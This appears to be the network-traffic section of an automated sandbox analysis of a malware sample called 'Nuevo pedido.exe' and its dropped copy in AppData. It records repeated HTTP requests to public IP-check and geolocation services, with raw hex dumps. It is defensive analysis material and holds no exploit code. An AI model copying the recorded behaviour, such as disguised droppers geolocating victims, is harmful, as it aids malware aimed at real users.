                                                                                                                                          X-Request-ID: bd0d85edaac974771c221146fc1b4958
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.449767193.122.130.0808116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:14.242419004 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:14.719979048 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:14 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: 3502b8fd07b68db523824b354b6368b2
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.449772193.122.130.0808116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 9, 2025 16:36:15.349977970 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 9, 2025 16:36:16.082178116 CET321INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Request-ID: a74714220f662eed99555c76c647a0a9
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449734104.21.16.14437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:02 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:02 UTC869INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:02 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751751
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGWdhXdn2z6XAmwxYTtq%2Bf%2F3hnLIaUyT28WPvcTMUuJGmqQmF%2F2zQ6ELnMBqgiFtmccAaEhl5AeH5wN4Ar40K%2BQSoYT%2FMA%2Ba%2F58XJ1CT%2Fok8K%2FoCi1ufVMMQC5%2Fx10eEELe6BUDz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff58028fe9f4388-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1616&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1801357&cwnd=221&unsent_bytes=0&cid=c3545eb3b928a80f&ts=668&x=0"
                                                                                                                                          2025-01-09 15:36:02 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449737104.21.16.14437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:04 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-09 15:36:04 UTC864INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:04 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751753
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZEjoQ0Zt2CJlWFEd1e46tlHLl6a41D94J%2FevSS9gaNUMyvIvct%2B96zYLqJOg%2B7jcX8NfWMFe7lfq%2FJI76%2B0kBIZ%2FZcV7BDWJUZBms3XMda6eQq4uZ7qj7%2B8GTaGUbbyNJ1C7TGP9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff58034ec650fa8-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9648&min_rtt=1534&rtt_var=5524&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1903520&cwnd=252&unsent_bytes=0&cid=800df69f630f117e&ts=160&x=0"
                                                                                                                                          2025-01-09 15:36:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.449739104.21.16.14437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:05 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:05 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:05 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751754
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T5gvm6QCLGGyrOLA9rqvcsip2g%2F2He4MeHPm5r%2FypAqGcYon2nbKkGJclU1jqOQuGZ9ayNRot%2FZs%2Bo6B3oDgcOH5LqWvUWWNSjDPXZFmqzIu1AqS6V11RoAxm%2Fl0fjUQuNuwPgBH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff5803bfb2341ba-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1598&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1745367&cwnd=192&unsent_bytes=0&cid=bcca67b1aad8fb2e&ts=191&x=0"
                                                                                                                                          2025-01-09 15:36:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449743104.21.16.14437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:06 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-09 15:36:07 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:06 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751756
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35thszIA6aeURvZ5EAIJeBiDERiHcvw57kgm%2B0ZlhEDlxE6vtemsZpN6m0d%2FFGmb6PHmnfp4A5THsf%2BEQ98bLNoLtErwAA0wlaXvufH0Q0lngCg5%2FeKg2awyukC64ctNkF2CWsuA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580436f978ce0-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1793&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1579232&cwnd=211&unsent_bytes=0&cid=d95d8a4b435a2e15&ts=167&x=0"
                                                                                                                                          2025-01-09 15:36:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.449742104.21.16.14438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:07 UTC855INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:07 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Cf-Ray: 8ff58043b9411899-EWR
                                                                                                                                          Server: cloudflare
                                                                                                                                          Age: 1751756
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Cf-Cache-Status: HIT
                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y0iaFlDZOshv72UX6XrY5b6yJ9KSGLGjbP4NRJFoH0i6kd0VjAPykpFz6ZbN8YdqruqWmGQE6DAwm%2BkNN7FQz1C6REvAbpTqQdRTSA%2Fj6FY0oNRQmFe5dnUGA4gXC0%2FiHYf4MDN9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1619&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1792510&cwnd=153&unsent_bytes=0&cid=a82a5770c2f14008&ts=319&x=0"
                                                                                                                                          2025-01-09 15:36:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449745104.21.16.14438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:07 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-09 15:36:08 UTC853INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:07 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751757
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UAu2ZdA63BHLAmMX2kuPLeIt44tlD4GOzd%2BqDtxxGr2s2TZ6WVgj32kBG4vYKW%2FOvMZnwiR67JA83B3XPByZJssoERFy4dZOOyOhQ04zFKrseRTz2MasFTEPjuxqPiFv7FzZFLvC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580492a1d0fa8-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1459&rtt_var=560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1929940&cwnd=252&unsent_bytes=0&cid=91250f45b3ec9627&ts=144&x=0"
                                                                                                                                          2025-01-09 15:36:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.449746104.21.16.14437764C:\Users\user\Desktop\Nuevo pedido.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:08 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:08 UTC855INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:08 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751757
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2hvSu2tq8U17HL7vkCGty9THxtJnTjyvs50MUPGRLm5w05hsev%2FtphEqQ6dkoy9lt6AMyuBhecdZTL4Re4ibVrzaRUaHE5YRXYEb%2BMcN9EEKNYQQwmxGjmdXl514%2BsXi4jPO5jZM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff5804b6a838ce0-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1806&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1616832&cwnd=211&unsent_bytes=0&cid=01aac611eb89df37&ts=271&x=0"
                                                                                                                                          2025-01-09 15:36:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.449749104.21.16.14438116C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-09 15:36:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-09 15:36:09 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 09 Jan 2025 15:36:09 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1751758
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGbDZeH12LXGqgatYhcpJloB09902gPQHNccDnZrw9ODRwHgMbr%2Ft83kSs%2FEfu6FKQmmrT8aAajjKkF0dFfww68c9EgOJD%2FUAuzps3xBH5JnVLkIIvd%2BQ8ye6umbRIZOy4fYr8%2FX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ff580517abd0fa8-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1476&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1938911&cwnd=252&unsent_bytes=0&cid=22baa965853323a4&ts=153&x=0"
